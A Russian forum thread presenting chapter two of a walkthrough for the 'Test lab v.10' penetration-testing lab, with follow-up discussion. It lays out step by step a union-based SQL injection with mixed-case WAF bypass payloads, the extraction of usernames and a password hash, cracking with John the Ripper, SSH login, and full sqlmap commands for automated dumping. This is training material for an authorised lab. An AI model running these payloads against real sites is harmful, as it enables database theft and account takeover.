Лаборатория тестирования на проникновение «Test lab v.10» — за гранью хакерских возможностей (2)

<~DarkNode~>

~^M1st3r_Bert0ni^~
Platinum
19.10.2016
724
3 093
Глава 2
Предыдущая глава
Следующая глава
Оглавление

tl10.png


И так привет колеги. Сегодня погрузимся дальше в роль хакера пентестера и возьмем свой второй токен. Попадем на машину ssh(172.16.0.8).
Вспоминаем что мы взяли в прошлый раз логин и пароль о почты. Пробуем этот логин и пароль везде где только можно,так использование одинаковых паролей - это одна из самых частых ошибок,которую допускает человек. Но увы этот пароль и логин от почты никуда не подошел,ни к админке к сайту,ни к ssh.Так что давайте ковыряться дальше.
И будем мы сегодня изучать атаку на веб приложение,а если чуть подробнее то поговорим о таком векторе как SQL Injection и обход простенького WAF-а (WAF - Web Application FIrewall).

Прежде чем начать,хотелось бы сказать на что стоит обращать внимания и чем пользоваться при пентесте веб приложения.Исходя из собственного опыта могу смело сказать ,что поиск уязвимостей веб приложения построен на обнаружении аномального поведения веб контента в результате реакции на передаваемые данные в сторону сервера(пользовательский ввод "GET|POST запросы" ,куки,служебные заголовки и т.д) И как вы уже догадались все сканеры уязвимостей построены по этой логики.Но бывают ситуации когда сканеры уязвимости не правильно понимают логику веб приложения и как результат дает не верные отчеты о найденных уязвимостей. К тому же, такие известные утилиты как SQLmap,Acunetix и много им подобные использую в качестве UserAgent-а свое имя,и добавив запрет на такие UserAgent-а можно уже защитится от атак школьниками.А если говорить о каких нибудь более серьезных средствах защитах и различных WAF-ах - то это очень сильно запутает логику работы сканера уязвимостей и как вывод из всего выше сказанного - ручной фаззинг и поиск уязвимостей в разы продуктивней чем работа сканеров.

Именно по этому мы сегодня с вами встретимся один на один с простенькой
и простеньким

Обычно я использую инструмент BurpSuite для ручного фаззинга,при работе с веб приложениями,но тут все гораздо проще.К тому же по этому инструменту нужно делать отдельный цикл статей)

Ну что же ,давайте посмотрим на наш сайт / еще разочек под другим ракурсом)

Первым делом проверим наличие админки на сайте:

2.PNG


Дальше потыкаем по постам на главной странице:

1.PNG


У нас есть один передаваемый параметр в GET запросе который отвечает за порядковый номер поста на сайте. Давайте с ним поиграем) По старой доброй привычке ткнем туда кавычку:

3.PNG


Хмм.. Странно но нас редиректнуло на главную страницу... Привычную ошибку синтаксиса не то что бы не видать,а как по первому взгляду - инъекцией и не пахнет скажете вы.Но эпоха админов которые включают вывод ошибок в PHP все потихоньку уходит в прошлое) И по этому весьма логично предположить что в случаи какой то ошибки ,или неправильного ввода пользователем весьма очевидно такое поведения.Все таки предположим что тут есть инъекция и нужно просто попробовать сбалансировать запрос:
Первой стадией при работе с SQL инъекцией является балансировка запроса:
Это нечто иное как найти правильные закрывающие символы в запросе и отрезка не нужной части комментарием,например если выборка с базы данных идет по запросу
PHP:
$result = mysql_query("SELECT * WHERE id = ('1')");
то балансировка этого запроса представляет собой в GET запросе передаваемым на сервер:
some_url/index.php?id=1') -- -
И правильными закрывающими символами тут будут ')
И как результат вывод должен быть таким же как и при some_url/index.php?id=1.Если запрос не сбалансирован то поведения контента будет разным

Ну что ж давайте играться с параметром id на нашем сайте:
4.PNG

5.PNG

6.PNG

7.PNG


Немножко поигрались - мы уже смогли найти Boolian Blind SQL Injection)
А теперь давайте разберем что мы сделали:
1)Сбалансировали запрос,после добавление правильных символов нас не бросало на главную,а выводился контент страницы которая имеет id=1
2)Попробовали добавить в запрос истинное выражение (and true -- -) и видим что нас перебросило на главную страницу...Хм..Так не должно быть.. Сразу же на ум приходит что тут стоит фильтр на пользовательский ввод.
3)Немного поигравшись с регистром - мы достигаем цели:
1') AnD TruE -- - нас не перебрасывает на главную) Вероятнее всего что фильтр работает только по словам в нижнем или верхнем регистре.
4)
1') AnD FalSe -- -Для закрепление вектора,это означает что если в запросе будет не истинное значение(ложь) или ошибка то нас будет бросать на главную.
Уже можно крутить как слепую булеан блайнд) Но нам еще нужно проверить на Union Based вектор инъекции.
Давайте найдем к-тво столбцов:
8.PNG
9.PNG
10.PNG


Как видем у нас два столбца в запросе,пробуем сделать вывод.Но что бы вывести наш юнион запрос нужно добавить ложь в основной запрос.
id=1') And FalSe UnIoN SeLeCt 11111,2222 -- -

11.PNG
12.PNG
13.PNG


Как видите,есть вывод) Как говорится инжектабельно))))
Давайте крутить дальше)

id=1') And FalSe UnIoN SeLeCt coNcaT(TaBLe_NamE),2222 fRoM InForMaTioN_SchEma.TabLeS WheRe TabLe_SchEma=database() limit 1,1-- -
15.PNG


id=1') And FalSe UnIoN SeLeCt coNcaT(ColuMn_NamE),2222 fRoM InForMaTioN_SchEma.coLuMnS WheRe TabLe_NaMe='users' limit 1,1-- -

16.PNG


id=1') And FalSe UnIoN SeLeCt coNcaT(ColuMn_NamE),2222 fRoM InForMaTioN_SchEma.coLuMnS WheRe TabLe_NaMe='users' limit 2,1-- -

17.PNG

id=1') And FalSe UnIoN SeLeCt coNcaT(username),2222 fRoM users-- -

18.PNG


id=1') And FalSe UnIoN SeLeCt coNcaT(password),2222 fRoM users-- -

19.PNG

на password как видим также WAF,ничего,обойдем:

id=1') And FalSe UnIoN SeLeCt coNcaT(paSSwOrD),2222 fRoM users-- -
20.PNG

И финальный ввывод)
21.PNG

Получаем имя и хеш)
Дальше что бы мне нагло не сливать вам токен , вам придется побрутить хеш)
Брутим хеш,(он пару секунд брутится)
Идем в админку,берем токен. И под этим же логином и паролем попадаем на ssh машину(ssh [email protected])
пароль из хеша
Дальше будем брать токен на SSH и учится пробрасывать порты.
Всем спасибо

Предыдущая глава
Следующая глава
Оглавление
 

Вложения

  • 14.PNG
    14.PNG
    37 КБ · Просмотры: 356

<~DarkNode~>

~^M1st3r_Bert0ni^~
Platinum
19.10.2016
724
3 093
Ну на тот случай если у кого то с брутом проблемы возникли то:

Добавляем в какойто тектстовый файлик следующий контент:
Код:
e.lindsey:$1$w9aURG9k$Wf1VIpv9VET3v3VWZ4YD8.
И запускаем команду:
Код:
john hashes.txt
И получаем навыходе:
Код:
Created directory: /root/.john
Warning: detected hash type "md5crypt", but the string is also recognized as "aix-smd5"
Use the "--format=aix-smd5" option to force loading these as that type instead
Using default input encoding: UTF-8
Loaded 1 password hash (md5crypt, crypt(3) $1$ [MD5 128/128 SSE2 4x3])
Press 'q' or Ctrl-C to abort, almost any other key for status
lindsey123       (e.lindsey)
1g 0:00:00:01 DONE 1/3 (2016-12-11 10:55) 0.6535g/s 4422p/s 4422c/s 4422C/s elindsey123..E123
Use the "--show" option to display all of the cracked passwords reliably
Session completed
И у нас есть пароль lindsey123 и логин e.lindsey

Логинимся в админку и забираем токен
затем конектимся к ssh:
ssh [email protected]

И гуляем по ссш:
2016-12-11-110351_545x61_scrot.png
2016-12-11-105549_1023x258_scrot.png
2016-12-11-112943_971x375_scrot.png

 
F

frostobot

Чем брутить то нужно было? Мне нашел пароль по хешу этот сервис
Я правильно понял, у нашего пользователя нет root-полномочий? Что мы тогда сможем при помощи него сделать? Ждать третьей части?)
 
Последнее редактирование модератором:

<~DarkNode~>

~^M1st3r_Bert0ni^~
Platinum
19.10.2016
724
3 093
Я правильно понял, у нашего пользователя нет root-полномочий? Что мы тогда сможем при помощи него сделать? Ждать третьей части?)
Нет конечно))) Вы представляете что бы было если бы был бы рут у всех) Все бы затерали токены и раняли бы сервер)

Брутил я джоном за пару секунд)
 

faust

One Level
11.12.2016
5
1
Не подскажете почему по ссылке выдает ошибку ssl_error_rx_record_too_long, а по ссылке все нормально. Или на порту 443 обычный http.
 

ghostphisher

местный
Grey Team
07.12.2016
2 605
3 408
Спасибо за статью! Вопрос:

1) Можно все это раскрутить sqlmap'om?
2) Если да, то какой тампер использовать
3) Подойдет ли для этих целей commix ?
 

<~DarkNode~>

~^M1st3r_Bert0ni^~
Platinum
19.10.2016
724
3 093
Спасибо за статью! Вопрос:

1) Можно все это раскрутить sqlmap'om?
2) Если да, то какой тампер использовать
3) Подойдет ли для этих целей commix ?
--tamper randomcase
Впринципе можно,но он криво крутит и намного дольше чем руками,хотя вектор ним обнаружить можно.
 
  • Нравится
Реакции: p0ttym4n и ghostphisher

ghostphisher

местный
Grey Team
07.12.2016
2 605
3 408
--tamper randomcase
Впринципе можно,но он криво крутит и намного дольше чем руками,хотя вектор ним обнаружить можно.

Руки удобнее, спортивнее. Однако если 2, 3 задания исполнять =) И автоматизация иногда выручает.

ПС Ради интереса

sqlmap --random-agent --url --crawl=2 --batch --dbs --level=3 --risk=3 --tamper randomcase --hex

посмотрю сколько времени займет и каков будет итог ;)

Дополняю

ушло 3 минуты, НО


[21:08:24] [ERROR] unable to retrieve the number of databases
[21:08:24] [INFO] falling back to current database
[21:08:24] [INFO] fetching current database
[21:08:25] [INFO] retrieved:
[21:08:25] [ERROR] unable to retrieve the database names, skipping to the next URL

не смог он базы определить, я так понимаю не хватает параметра.
 
Последнее редактирование:
  • Нравится
Реакции: p0ttym4n и <~DarkNode~>
P

p0ttym4n

Очень информативно, спасибо за статью)

а какие еще можно встретить препятствия помимио WAF-ов и проверок вводимых параметров?
 
  • Нравится
Реакции: <~DarkNode~>

ghostphisher

местный
Grey Team
07.12.2016
2 605
3 408
Ради интереса пытаюсь вытащить базы sqlmap'om но вот как то не выходит. Ошибка [ERROR] unable to retrieve the number of databases.
Я перепробовал разные тамперы. Пробовал --hex --nocast, тот же итог. Очень хочется решить эту задачу =) Если кто в курсе, подскажите, чего не хватает.


sqlmap --identify-waf -v3 --random-agent --url --crawl=2 --batch --dbms=mysql --dbs --level=3 --risk=3 --tamper space2mysqlblank --no-cast --threads 10

Изначально было sqlmap --random-agent --url --crawl=2 --batch --dbs --level=3 --risk=3 --tamper randomcase --hex
 

<~DarkNode~>

~^M1st3r_Bert0ni^~
Platinum
19.10.2016
724
3 093
Очень хочется решить эту задачу =) Если кто в курсе, подскажите, чего не хватает.

sqlmap --flush-session --tamper randomcase --random-agent --level 5 --code=200 --prefix "')" --suffix=" -- - " --risk 3 -v 2 --url " *" --technique U -D site --threads 10 --tables --common-tables

--tamper randomcase
-- использовать фильтр скульмапа для генерации пейлоада в различном регистре
--random-agent -- использовать случайный UserAgent
--code=200 -- использовать в качестве валидных ответов заголовок ответа 200 ок, 301(редирект) будет распознан как невалидный запрос
--level 5 --использовать маскимальный уровень поиска векторов
--risk 3 почти тоже самое что и --level
--technique U --пытаться использовать только векторы UnionBased SQL injection
--url " *" -- астериксом(*) мы указываем место для инжекта
--prefix -- то что использовать в начале запроса
--suffix -- то что использовать в конце запроса
--threads 10 - к-тво потоков
Ошибка [ERROR] unable to retrieve the number of databases.
--flush-session - очистить сессию скульмапа

111.PNG
 
Последнее редактирование:

ghostphisher

местный
Grey Team
07.12.2016
2 605
3 408
sqlmap --flush-session --tamper randomcase --random-agent --level 5 --code=200 --prefix "')" --suffix=" -- - " --risk 3 -v 2 --url " *" --technique U -D site --threads 10 --tables --common-tables

Как обычно на отлично! ;)
Теперь у меня остался один не решенный вопрос - --code=200 --prefix "')" --suffix=" -- - " <--- если бы это не было указано, скульмап не нашел бы это самостоятельно. Из чего получается, что с префиксами и суфиксами требуется ручная работа. Верно я понимаю?

дополнение:

[18:54:24] [INFO] analyzing table dump for possible password hashes
Database: site
Table: users
[1 entry]
+----+-----------+
| id | username |
+----+-----------+
| 1 | e.lindsey |
+----+-----------+

Но хэша нет...

sqlmap --tamper randomcase --random-agent --level 5 --code=200 --prefix "')" --suffix=" -- - " --risk 3 -v 2 --url " " --technique U -D site --threads 10 --tables --common-tables -T users --dump

пробовал так. что опять упустил? ;)
 
Последнее редактирование:

<~DarkNode~>

~^M1st3r_Bert0ni^~
Platinum
19.10.2016
724
3 093
Как обычно на отлично! ;)
Теперь у меня остался один не решенный вопрос - --code=200 --prefix "')" --suffix=" -- - " <--- если бы это не было указано, скульмап не нашел бы это самостоятельно. Из чего получается, что с префиксами и суфиксами требуется ручная работа. Верно я понимаю?

Только в 2 раза меньше таблиц=)
Нашел бы,просто так быстрее, --code=200 тут нужно потому что тут не стандартное поведение контента,тут нету ошибки на вывод,тут есть редирект вместо ошибки. По идеи и без этого параметра должно отработать,но sqlmap - это программа,не стоит забывать,она может не коректно понимать логику поведения страницы,и именно в таких ситуациях лучше использовать такой параметр)
 
  • Нравится
Реакции: p0ttym4n и ghostphisher

<~DarkNode~>

~^M1st3r_Bert0ni^~
Platinum
19.10.2016
724
3 093

[18:54:24] [INFO] analyzing table dump for possible password hashes
Database: site
Table: users
[1 entry]
+----+-----------+
| id | username |
+----+-----------+
| 1 | e.lindsey |
+----+-----------+

Но хэша нет...

sqlmap --tamper randomcase --random-agent --level 5 --code=200 --prefix "')" --suffix=" -- - " --risk 3 -v 2 --url " " --technique U -D site --threads 10 --tables --common-tables -T users --dump

пробовал так. что опять упустил? ;)
Попробуй сперва найти столбец password в таблице users. Я не помню просто есть ли точно он в common-columns,но должен быть.
Попробуй сначала так:
sqlmap --tamper randomcase --random-agent --level 5 --code=200 --prefix "')" --suffix=" -- - " --risk 3 -v 2 --url " " --technique U -D site --threads 10 -T users --common-columns
А потом
sqlmap --tamper randomcase --random-agent --level 5 --code=200 --prefix "')" --suffix=" -- - " --risk 3 -v 2 --url " " --technique U -D site --threads 10 -T users --dump
Или же просто так:
sqlmap --tamper randomcase --random-agent --level 5 --code=200 --prefix "')" --suffix=" -- - " --risk 3 -v 2 --url " " --technique U -D site --threads 10 -T users -С username,password --dump
 
  • Нравится
Реакции: p0ttym4n и ghostphisher

<~DarkNode~>

~^M1st3r_Bert0ni^~
Platinum
19.10.2016
724
3 093
Вообще,сугубо мое мнение по поводу sqlmap - это утилита которая используется больше как для постэксплуатации sql injection , но не для поиска. Уязвимость находится сперва ,проверяется на наличия WAF-а,изучается поведения вафа, и только потом в бой выходит скульмап)
На своем опыте я встречал такие инъекции которые посылали скульмап куда подальше,но руки никогда не подводили))
Вот пару старых моих видео про работу руками если кому интересно:
[hide=12]
 
  • Нравится
Реакции: Didi и ghostphisher

ghostphisher

местный
Grey Team
07.12.2016
2 605
3 408
Вообще,сугубо мое мнение по поводу sqlmap - это утилита которая используется больше как для постэксплуатации sql injection , но не для поиска. Уязвимость находится сперва ,проверяется на наличия WAF-а,изучается поведения вафа, и только потом в бой выходит скульмап)
На своем опыте я встречал такие инъекции которые посылали скульмап куда подальше,но руки никогда не подводили))

итог тот же
Database: site
Table: users
[1 entry]
+----+-----------+
| id | username |
+----+-----------+
| 1 | e.lindsey |
+----+-----------+

что ж, это еще раз доказала про руки и мозг ;) Спасибо за подробные ответы - информация очень полезная.
 
  • Нравится
Реакции: <~DarkNode~>
Мы в соцсетях:

Обучение наступательной кибербезопасности в игровой форме. Начать игру!